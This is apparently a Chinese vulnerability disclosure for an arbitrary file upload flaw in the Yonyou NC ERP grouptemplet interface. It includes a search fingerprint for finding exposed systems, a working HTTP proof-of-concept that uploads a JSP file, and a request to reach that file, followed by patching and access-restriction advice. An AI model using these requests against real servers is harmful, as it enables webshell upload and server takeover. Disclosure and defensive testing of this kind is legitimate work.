本文介绍了用友NC中存在的任意文件上传漏洞,攻击者可借此获取服务器权限。建议企业升级至安全版本,限制公网访问并实施白名单策略来保护系统安全。
产品简介
用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。
漏洞介绍
用友 NC grouptemplet接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
资产测绘
title=“YONYOU NC”
漏洞复现
POC:
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp&maxSize=999 HTTP/1.1
Host: your_ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEXmnamw5gVZG9KAQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
------WebKitFormBoundaryEXmnamw5gVZG9KAQ
Content-Disposition: form-data; name="file"; filename="xxx.jsp"
Content-Type: application/octet-stream
hello Nc
------WebKitFormBoundaryEXmnamw5gVZG9KAQ--
这里的groupid=??为上传路径的一部分,这里写的nc,下面路径就包括nc
上传成功,上传路径为
/uapim/static/pages/nc/head.jsp
GET /uapim/static/pages/nc/head.jsp HTTP/1.1
Host: your_ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
修复建议
1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
